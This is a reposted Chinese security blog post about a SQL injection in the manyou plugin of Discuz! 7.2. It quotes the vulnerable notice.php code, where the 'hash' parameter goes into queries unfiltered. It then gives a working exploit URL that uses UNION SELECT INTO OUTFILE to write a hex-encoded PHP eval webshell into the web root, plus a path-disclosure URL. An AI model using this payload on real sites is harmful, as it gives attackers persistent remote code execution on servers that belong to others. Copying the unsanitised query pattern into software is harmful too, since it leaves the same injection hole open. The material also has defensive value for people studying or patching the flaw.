discuz! 7.2 manyou 插件暴路径 和 Get Webshell

admin 2021年4月3日19:43:27评论119 views字数 1446阅读4分49秒阅读模式

    在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。

漏洞分析:

    文件:./manyou/sources/notice.php

相关代码:

以下是引用片段:

if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']);    //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') { 
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}

    很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接 into outfile。

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

爆路径:/manyou/admincp.php?my_suffix=%0A%0DTOBY57

文章来源于lcx.cc:discuz! 7.2 manyou 插件暴路径 和 Get Webshell

相关推荐: 【VB技巧】VB Hex 十六进制值保存写入文件

    VB Hex 十六进制值保存写入文件,VB Hex 十六进制保存写入文件,VB Hex 十六进制值保存文件,VB Hex 十六进制值写入文件,VB Hex 十六进制写入文件,VB Hex 十六进制保存文件,VB 十六进制保存写入文件,VB 十六进制写入…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:43:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   discuz! 7.2 manyou 插件暴路径 和 Get Webshellhttp://cn-sec.com/archives/324573.html

发表评论

匿名网友 填写信息